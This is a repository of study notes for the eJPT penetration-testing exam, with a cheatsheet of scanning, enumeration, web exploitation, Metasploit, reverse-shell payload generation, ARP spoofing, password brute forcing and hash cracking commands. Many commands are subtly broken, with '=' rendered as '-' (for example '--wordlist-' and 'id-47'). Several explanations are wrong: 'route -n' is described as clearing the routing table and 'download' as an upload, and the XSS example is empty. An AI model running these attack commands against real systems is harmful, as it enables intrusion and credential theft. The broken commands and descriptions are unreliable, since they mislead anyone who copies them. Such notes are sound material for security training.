├── README.md ├── condensed_notes └── README.md └── images └── obfuscated_cert.png /README.md: -------------------------------------------------------------------------------- 1 | # eJPT Notes 2 | 3 | ![eJPT Certification](images/obfuscated_cert.png) 4 | 5 | ## Introduction 6 | 7 | This repository holds my notes for the eLearnSecurity Junior Penetration Tester certification. While I would recommend you use these notes, I would also encourage you to make your own as you go through the INE [Penetration Testing Student](https://my.ine.com/CyberSecurity/learning-paths/a223968e-3a74-45ed-884d-2d16760b8bbd/penetration-testing-student) course. 8 | 9 | For effective notetaking, I would highly recommend [Obsidian](https://obsidian.md/). I have only started to use this recently and it has completely changed the way I write notes and ridiculously increased my productivity. 10 | 11 | The notes that follow do not contain details about the labs or the exam for obvious reasons. Also note that INE update their courses frequently so some of this information may be outdated. I will do my best to update them, but I'm not planning on doing a complete overhaul should the course be changed significantly. 12 | 13 | **Date last updated**: 6th January 2021 14 | 15 | ## Condensed Notes 16 | 17 | Click [here](condensed_notes/README.md) for quick cheatsheet-style notes. 18 | 19 | ## Final Comments 20 | 21 | I am very much a "quality of quantity" person, so the content I produce takes a long time for me to create. If you like this or found it useful, buy me a coffee: 22 | 23 | Buy Me A Coffee 24 | 25 | If you want to keep up to date on what I do, follow me here: 26 | 27 | - [Twitter](https://twitter.com/0xV3R4X) 28 | - [GitHub](https://github.com/0xv3r4x) 29 | -------------------------------------------------------------------------------- /condensed_notes/README.md: -------------------------------------------------------------------------------- 1 | # eJPT Condensed Notes 2 | 3 | These are my condensed notes to help you on the eJPT exam. The layout of this document follows a logical order from enumeration to exploitation. Steps should be repeated where necessary. 4 | 5 | ## Common Ports 6 | 7 | ### TCP 8 | 9 | | **Port** | **Service** | 10 | | ---- | ------- | 11 | | 21 | FTP | 12 | | 22 | SSH | 13 | | 23 | Telnet | 14 | | 25 | SMTP | 15 | | 53 | DNS | 16 | | 80 | HTTP | 17 | | 110 | POP3 | 18 | | 139 + 445 | SMB | 19 | | 143 | IMAP | 20 | | 443 | HTTPS | 21 | 22 | ### UDP 23 | 24 | | **Port** | **Service** | 25 | | ---- | ------- | 26 | | 53 | DNS | 27 | | 67 | DHCP | 28 | | 68 | DHCP | 29 | | 69 | TFTP | 30 | | 161 | SNMP | 31 | 32 | ## Other Useful Ports 33 | 34 | | **Port** | **Service** | 35 | | ---- | ------- | 36 | | 1433 | MS SQL Server | 37 | | 3389 | RDP | 38 | | 3306 | MySQL | 39 | 40 | ## Scanning and Enumeration 41 | 42 | ### Establish your IP with `ifconfig` 43 | 44 | Use `ifconfig` to establish your IP. For example: 45 | 46 | ```console 47 | $ ifconfig 48 | tap0: flags-4163 mtu 1500 49 | inet 192.168.193.70 netmask 255.255.255.0 broadcast 0.0.0.0 50 | inet6 fe80::c8f:29ff:feb4:5219 prefixlen 64 scopeid 0x20 51 | ether 0e:8f:29:b4:52:19 txqueuelen 1000 (Ethernet) 52 | RX packets 14 bytes 1541 (1.5 KiB) 53 | RX errors 0 dropped 4 overruns 0 frame 0 54 | TX packets 9 bytes 754 (754.0 B) 55 | TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 56 | ``` 57 | 58 | ### Ping Sweeps using `fping` 59 | 60 | ```console 61 | $ fping -a -g IPRANGE 62 | ``` 63 | 64 | - `-a` only shows **alive hosts** 65 | - `-g` performs a **ping sweep** instead of a normal ping 66 | 67 | For example: 68 | 69 | ```console 70 | $ fping -a -g 192.168.32.0/24 71 | 72 | OR 73 | 74 | $ fping -a -g 192.168.82.0 192.168.82.255 75 | ``` 76 | 77 | You can also suppress warnings by directing the process standard error to `/dev/null`: 78 | 79 | ```console 80 | $ fping -a -g 192.168.32.0/24 2>/dev/null 81 | 82 | OR 83 | 84 | $ fping -a -g 192.168.82.0 192.168.82.255 2>/dev/null 85 | ``` 86 | 87 | ### Combining `fping` with `nmap` 88 | 89 | Using `fping` to discover hosts and directing it to an output file `ips.txt`: 90 | 91 | ```console 92 | $ fping -a -g IPRANGE 2>/dev/null > ips.txt 93 | ``` 94 | 95 | Then, use `nmap` to conduct a ping scan: 96 | 97 | ```console 98 | $ nmap -sn -iL ips.txt 99 | ``` 100 | 101 | ### Host Discovery with `nmap` 102 | 103 | Perform a ping scan using `-sn`: 104 | 105 | ```console 106 | $ nmap -sn IPRANGE 107 | ``` 108 | 109 | For example: 110 | 111 | ```console 112 | $ nmap -sn 200.200.0.0/16 113 | $ nmap -sn 200.200.123.1-12 114 | $ nmap -sn 172.16.12.* 115 | $ nmap -sn 200.200.12-13.* 116 | ``` 117 | 118 | You can also load files from an input list using `-iL`: 119 | 120 | ```console 121 | $ nmap -sn -iL FILENAME.EXTENSION 122 | ``` 123 | 124 | For example, a file named `hostlist.txt` contains the following: 125 | 126 | ```console 127 | 192.168.32.0/24 128 | 172.16.12.* 129 | 200.200.123.1-12 130 | ``` 131 | 132 | The `nmap` command would then become: 133 | 134 | ```console 135 | $ nmap -sn -iL hostlist.txt 136 | ``` 137 | 138 | ### Enumeration with `nmap` 139 | 140 | For each host on a network, you can run the following to enumerate it: 141 | 142 | ```console 143 | $ nmap -p- -Pn -sC -sV 144 | ``` 145 | 146 | - `-p-` scans all ports 147 | - `-Pn` assumes all ports are open 148 | - `-sC` performs a **script scan** 149 | - `-sV` performs a **version detection scan** 150 | 151 | For example: 152 | 153 | ```console 154 | # Full port enumeration outputted to file 155 | $ nmap -p- -Pn -sC -sV 192.168.1.24 -oN initial_scan 156 | 157 | # First 1000 ports 158 | $ nmap -p 1-1000 192.168.1.24 159 | 160 | # Service detection scan on /24 network 161 | $ nmap -sV 10.11.12.0/24 162 | 163 | # TCP connect scan on two targets 164 | $ nmap -sT 192.168.12.33,34 165 | 166 | # Full scan (all ports, syn/script/version scan) 167 | $ nmap -Pn -T4 --open -sS -sC -sV --min-rate-1000 --max-retries-3 -p- -oN output_file 10.10.10.2 168 | ``` 169 | 170 | ### Shares Enumeration 171 | 172 | #### Using `smbclient` 173 | 174 | List shares: 175 | 176 | ```console 177 | $ smbclient -L /// -N 178 | ``` 179 | 180 | Mount share: 181 | 182 | ```console 183 | $ smbclient /// 184 | ``` 185 | 186 | #### Using `enum4linux` 187 | 188 | ```console 189 | $ enum4linux -a 190 | ``` 191 | 192 | #### Using `nmblookup` 193 | 194 | ```console 195 | $ nmblookup -A 196 | ``` 197 | 198 | #### Using `nmap` 199 | 200 | ```console 201 | $ nmap --script smb-vuln* -p 202 | ``` 203 | 204 | ### Banner Grabbing 205 | 206 | #### Using `netcat` 207 | 208 | ```console 209 | $ nc -nv 210 | ``` 211 | 212 | For example: 213 | 214 | ```console 215 | $ nc -nv 192.168.1.24 80 216 | ``` 217 | 218 | #### Using `openssl` (HTTPS) 219 | 220 | ```console 221 | $ openssl s_client -connect :443 222 | ``` 223 | 224 | ### Common Wireshark Filters 225 | 226 | | Description | Syntax | Example | 227 | | ----------- | ------ | ------- | 228 | | Filter by IP | `ip.add -- IP ADDRESS` | `ip.add -- 192.168.1.28` | 229 | | Filter by Destination IP | `ip.dest -- IP ADDRESS` | `ip.add -- 192.168.1.28` | 230 | | Filter by Source IP | `ip.src -- IP ADDRESS` | `ip.add -- 192.168.1.72` | 231 | | Filter by Port | `tcp.port -- PORT` | `tcp.port -- 80` | 232 | | Filter by IP Address and Port | `ip.addr -- IP ADDRESS and tcp.port -- PORT` | `ip.addr -- 10.9.0.1 and tcp.port -- 80` | 233 | | Filter by Request (HTTP/HTTPS) | `request.method -- METHOD` | `request.method -- "POST"` or `request.method -- "GET"` 234 | 235 | ### Web Enumeration 236 | 237 | #### Directory Fuzzing with `gobuster` 238 | 239 | ```console 240 | $ gobuster dir -u -w 241 | ``` 242 | 243 | For example: 244 | 245 | ```console 246 | # Directory scan against one target using medium wordlist 247 | $ gobuster dir -u http://192.168.1.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 248 | 249 | # Directory scan against specific directory using custom wordlist 250 | $ gobuster dir -u http://192.168.5.24/confidential -w custom_wordlist.txt 251 | 252 | # Directory scan with authentication 253 | $ gobuster dir -u http://192.168.4.16 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -U admin 254 | ``` 255 | 256 | #### Directory Fuzzing with `dirb` 257 | 258 | ```console 259 | $ dirb 260 | ``` 261 | 262 | For example: 263 | 264 | ```console 265 | # Directory scan against one target 266 | $ dirb http://192.168.1.72/ /usr/share/wordlists/dirb/common.txt 267 | 268 | # Directory scan with authentication 269 | $ dirb http://192.168.1.85/ -u "username:password" /usr/share/wordlists/dirb/common.txt 270 | ``` 271 | 272 | #### Enumeration with `nikto` 273 | 274 | ```console 275 | $ nikto -h URL 276 | ``` 277 | 278 | For example: 279 | 280 | ```console 281 | $ nikto -h http://192.168.1.10/ 282 | ``` 283 | 284 | #### `whois` 285 | 286 | ```console 287 | $ whois 288 | ``` 289 | 290 | ## Routing and Pivoting 291 | 292 | ### Clear Routing Table 293 | 294 | To completely clear the routing table, run the following: 295 | 296 | ```console 297 | $ route -n 298 | ``` 299 | 300 | Use this when setting up a route to make the destination and gateway more clear 301 | 302 | ### Show Routing Table 303 | 304 | On Windows (and Linux), you can use `arp -a`: 305 | 306 | ```console 307 | $ arp -a 308 | ``` 309 | 310 | And, on Linux, you can use `ip route`: 311 | 312 | ```console 313 | $ ip route 314 | ``` 315 | 316 | ### Setting up a Route with `iproute` 317 | 318 | ```console 319 | $ ip route add via 320 | ``` 321 | 322 | For example: 323 | 324 | ```console 325 | $ ip route add 192.168.1.0/24 via 10.10.22.1 326 | ``` 327 | 328 | This adds a route to the `192.168.1.0/24` network via the `10.10.22.1` router. 329 | 330 | ## Exploitation 331 | 332 | ### Web Exploitation 333 | 334 | #### Manual SQL Injection (SQLi) 335 | 336 | | Description | Injection | 337 | | ----------- | --------- | 338 | | Basic union | `xx' UNION SELECT null; -- -` | 339 | | Basic bypass | `' or 1-1; -- -` | 340 | 341 | #### Automated Exploitation with `sqlmap` 342 | 343 | ```console 344 | $ sqlmap -u -p [options] 345 | ``` 346 | 347 | For example: 348 | 349 | ```console 350 | # Display all tables in the database 351 | $ sqlmap -u http://10.10.0.1/index.php?id-47 --tables 352 | 353 | # Enumerate the id parameter using the union technique 354 | $ sqlmap -u 'http://192.168.1.72/index.php?id-10' -p id --technique-U 355 | 356 | # Dump database contents 357 | $ sqlmap -u 'http://192.162.5.51/index.php?id-203' --dump 358 | 359 | # Prompt for interactive OS shell 360 | $ sqlmap -u 'http://192.168.1.17/index.php?id-1' -os-shell 361 | ``` 362 | 363 | #### Cross-Site Scripting (XSS) 364 | 365 | Test inputs against XSS using: 366 | 367 | ```js 368 | 369 | ``` 370 | 371 | ### Host Exploitation 372 | 373 | #### `arpspoof` 374 | 375 | First, tell your machine to forward packets to the destination host 376 | 377 | ```console 378 | $ echo 1 > /proc/sys/net/ipv4/ip_forward 379 | ``` 380 | 381 | Then, run `arpspoof`: 382 | 383 | ```console 384 | $ arpspoof -i -t -r 385 | ``` 386 | 387 | For example: 388 | 389 | ```console 390 | $ arpspoof -i tap0 -t 10.10.5.1 -r 10.10.5.7 391 | ``` 392 | 393 | #### Basic Metasploit Usage 394 | 395 | Launch Metasploit by running: 396 | 397 | ```console 398 | $ msfconsole 399 | ``` 400 | 401 | Basic commands: 402 | 403 | ```console 404 | # Search for exploit 405 | msf5 > search apache 406 | 407 | # Use exploit (by number) 408 | msf5 > use 1 409 | 410 | # Use exploit (by name) 411 | msf5 > use exploit/multi/handler 412 | 413 | # Set parameter 414 | msf5 > set payload windows/x64/meterpreter/reverse_tcp 415 | 416 | # Show parameters and other options 417 | msf5 > show options 418 | ``` 419 | 420 | For example, to configure a listener for a reverse shell: 421 | 422 | ```console 423 | $ msfconsole 424 | $ use exploit/multi/handler 425 | $ set payload 426 | $ set LHOST 427 | $ set LPORT 428 | $ exploit 429 | ``` 430 | 431 | #### Generate Payload Using `msfvenom` 432 | 433 | Standard PHP reverse shell: 434 | 435 | ```console 436 | $ msfvenom -p php/reverse_php LHOST= LPORT= -o 437 | ``` 438 | 439 | Windows reverse shell: 440 | 441 | ```console 442 | $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f dll > shell.dll 443 | ``` 444 | 445 | Linux reverse shell: 446 | 447 | ```console 448 | $ msfvenom -p linux/x64/shell/reverse_tcp LHOST= LPORT= -f elf > shell.elf 449 | ``` 450 | 451 | #### Meterpreter Shell Commands 452 | 453 | ```console 454 | # background current session 455 | meterpreter > background 456 | 457 | # list current open sessions 458 | meterpreter > session -l 459 | 460 | # open session 461 | meterpreter > session -i 462 | 463 | # privilege escalation (Windows) 464 | meterpreter > getsystem 465 | 466 | # list system information 467 | meterpreter > sysinfo/route/getuid 468 | 469 | # dump Windows hashes 470 | meterpreter > hashdump 471 | 472 | # upload file to system 473 | meterpreter > download /path/to/directory 474 | ``` 475 | 476 | #### Listener with `netcat` 477 | 478 | ```console 479 | $ nc -nvlp PORT 480 | ``` 481 | 482 | - `n`: IP addresses only (no DNS) 483 | - `v`: verbose mode (`-vv` for very verbose) 484 | - `l`: listen for incoming connections 485 | - `p`: local port to listen on 486 | 487 | For example: 488 | 489 | ```console 490 | $ nc -nvlp 4444 491 | ``` 492 | 493 | #### Stabilise a Shell 494 | 495 | Spawn an interactive terminal via Python: 496 | 497 | ```console 498 | # First check if the system has Python 499 | $ which python 500 | /usr/bin/python 501 | 502 | # Then, spawn a Python shell using pty 503 | $ python -c "import pty; pty.spawn('/bin/bash')" 504 | 505 | # Finally, export XTERM (allows you to clear terminal) 506 | $ export TERM=xterm 507 | ``` 508 | 509 | **NOTE**: this works the same with `python3`. 510 | 511 | ## Bruteforcing 512 | 513 | ### `hydra` 514 | 515 | ```console 516 | $ hydra -L -P -s 517 | 518 | OR 519 | 520 | $ hydra -l -P -t -s 521 | ``` 522 | 523 | ```console 524 | # Bruteforce SSH 525 | $ hydra -L users.txt -P pass.txt 10.10.10.2 ssh -s 22 526 | $ hydra -L users.txt -P pass.txt ssh://10.10.10.2 527 | 528 | # Bruteforce FTP 529 | $ hydra -l admin -P passwords.txt 192.168.1.4 ftp -s 21 530 | $ hydra -l admin -P passwords.txt ftp://192.168.1.4 531 | ``` 532 | 533 | ### John The Ripper (`john`) 534 | 535 | First, prepare a file for `john` to crack: 536 | 537 | ```console 538 | $ unshadow passwd shadow > hash 539 | ``` 540 | 541 | Crack the passwords: 542 | 543 | ```console 544 | $ john --wordlist-/usr/share/wordlists/rockyou.txt hash 545 | ``` 546 | 547 | ## Other cheatsheets: 548 | 549 | - Hydra: https://github.com/frizb/Hydra-Cheatsheet 550 | - GTFOBins: https://gtfobins.github.io/ 551 | -------------------------------------------------------------------------------- /images/obfuscated_cert.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xv3r4x/ejpt_cheatsheet/fdc3adae06a595d30da4d737527234de8fd8452d/images/obfuscated_cert.png --------------------------------------------------------------------------------